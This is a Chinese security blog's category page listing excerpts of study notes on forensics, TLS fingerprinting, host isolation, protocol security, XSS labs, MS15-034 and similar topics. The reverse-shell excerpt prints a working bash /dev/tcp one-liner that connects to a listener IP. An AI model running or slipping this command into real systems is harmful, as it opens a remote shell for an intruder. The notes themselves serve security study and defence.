随笔分类 -  学习

1 2 下一页
取证笔记
摘要:#下载环境 https://csilinux.com CSI Linux User:csi Passwd:csi 更新powerup Kali linux 开启forensic http://dftt.sourceforge.net/ #操作 ##Autopsy http://dftt.source 阅读全文
posted @ 2022-02-24 20:06 歇马 阅读(103) 评论(0) 推荐(0)
SSL证书的SAN
摘要:参考链接http://pkiglobe.org/subject_alt_name.html When this SSL server certificate is presented to the browser and if the domain from where the certificat 阅读全文
posted @ 2022-02-21 19:08 歇马 阅读(183) 评论(0) 推荐(0)
JA3 JA3S JARM学习
摘要:偶然看到一篇介绍JARM工具的文章,用于识别TLS指纹,其中还可以用于Cobalt Strike识别。 #关于JARM ##工具介绍 一个TLS服务器指纹识别工具 https://codeload.github.com/salesforce/jarm/zip/refs/heads/master 通过 阅读全文
posted @ 2021-08-27 16:08 歇马 阅读(1629) 评论(1) 推荐(0)
隔离主机断网操作
摘要:记录一下断网的几种操作: 为什么要断网? 中毒 防止横向移动 怎么做? 拔网线 卸载网卡 /etc/modprobe.conf,删除alias eth1 XXXX /etc/sysconfig/networking/devices目录下,将ifcfg-eth1删除 /etc/sysconfig/ne 阅读全文
posted @ 2021-08-05 17:02 歇马 阅读(165) 评论(0) 推荐(0)
反弹shell学习
摘要:#反弹shell命令解析 攻击者在机器上监听相应端口,在受害者机器执行反弹shell命令,然后get shell。 bash -i >&/dev/tcp/192.168.190.138/6666 0>&1 ##bash -i 启动一个交互式shell 交互式shell的意思就是跟用户交互,你输入一行 阅读全文
posted @ 2020-07-27 11:23 歇马 阅读(183) 评论(0) 推荐(0)
内网全局代理工具-流量特征
摘要:#Regeorg+Proifier 参考链接https://www.freebuf.com/articles/network/208221.html Windows reGeorg+proxifier 正向代理 环境 攻击端(Win10):192.168.223.1 靶机一(Win2008):外网I 阅读全文
posted @ 2020-07-13 09:51 歇马 阅读(2194) 评论(0) 推荐(0)
TCP/UDP协议安全
摘要:#端口 首先要理解端口(port)的概念。端口是一种抽象的软件结构,包括一些数据结构和I/O缓冲。 进程通过系统调用与端口建立连接(binding),之后传输层传给该端口的数据都被相应进程所接收,而相应进程发给传输层的数据也通过该端口。端口操作类似于一般的I/O操作,进程获取一个端口,相当于获取本地 阅读全文
posted @ 2020-07-07 15:55 歇马 阅读(587) 评论(0) 推荐(0)
ICMP协议安全
摘要:#从ICMP协议开始 参考链接 https://www.cnblogs.com/bjlhx/p/10985384.html 一个新搭建好的网络,往往需要先进行一个简单的测试,来验证网络是否畅通;但是IP协议并不提供可靠传输。如果丢包了,IP协议并不能通知传输层是否丢包以及丢包的原因。 所以我们就需要 阅读全文
posted @ 2020-07-03 10:02 歇马 阅读(808) 评论(0) 推荐(0)
IP协议安全
摘要:#从IP协议安全开始 ##IP数据包 IP协议 IP包在网络层 不保证可靠性 数据包可能重复、丢失,是无连接协议 首先要看TCP/IP协议,涉及到四层:链路层,网络层,传输层,应用层。 其中以太网(Ethernet)的数据帧在链路层 Frame是链路层的基本单元,包含链路层的头部信息(mac地址)和 阅读全文
posted @ 2020-07-02 14:43 歇马 阅读(858) 评论(0) 推荐(0)
ustc sec
摘要: 阅读全文
posted @ 2020-07-01 16:20 歇马 阅读(176) 评论(0) 推荐(0)
[阅读笔记]web应用指纹识别
只有注册用户登录后才能阅读该文。
posted @ 2020-06-12 09:21 歇马 阅读(4) 评论(0) 推荐(0)
攻击图与关联分析
该文被密码保护。
posted @ 2020-06-11 14:15 歇马 阅读(4) 评论(0) 推荐(0)
SMB知识汇总
摘要:#SMB是什么 SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。SM 阅读全文
posted @ 2020-06-03 10:32 歇马 阅读(2976) 评论(0) 推荐(0)
XSS靶场
摘要:Level1 Level2: 有两处可利用 第二处测试: Level3: 如何判断被转义呢 onFocus是JavaScript的百里面的在对象获度得焦点时发生的事件,最简单的实例就是网页知的上的一个输入框,当使用鼠标点击该输入框使输入框被选中可以输入内容的时候就是该输入框获得焦点的时候,此时输入框 阅读全文
posted @ 2020-04-29 14:38 歇马 阅读(204) 评论(0) 推荐(0)
3389远程连接
摘要:#3389远程连接流量分析 Cookie mstshash=Administr.. 本地尝试连接3389 抓包流量如下 请求中包含Cookie:mstshash=Administo 位于TransportLayerSecurity中 后面内容应该是被加密了 流量包中短时间内多次出现该字段 有可能是3 阅读全文
posted @ 2020-04-16 20:26 歇马
MS15-034漏洞分析
摘要:CVE 2015 1635 HTTP.SYS远程执行代码漏洞(ms15 034) 条件 18446744073709551615转为十六进制即是 0xFFFFFFFFFFFFFFFF(16个F),是64位无符号整形所能表达的最大整数,那么我们很容易可以想到,这个“整数溢出”必然同这个异常的超大整数有 阅读全文
posted @ 2020-04-09 12:02 歇马
Nmap SMB扫描分析
只有注册用户登录后才能阅读该文。
posted @ 2020-04-01 10:55 歇马
RFD学习
摘要:RFD,即Reflected File Download反射型文件下载漏洞,是一个2014年来自BlackHat的漏洞。这个漏洞在原理上类似XSS,在危害上类似DDE:攻击者可以通过一个URL地址使用户下载一个恶意文件,从而危害用户的终端PC。 这个漏洞很罕见,大多数公司会认为它是一个需要结合社工的 阅读全文
posted @ 2020-03-30 11:13 歇马
越权漏洞检测
只有注册用户登录后才能阅读该文。
posted @ 2020-03-27 09:04 歇马
[转载]CSRF
只有注册用户登录后才能阅读该文。
posted @ 2020-03-25 10:36 歇马

1 2 下一页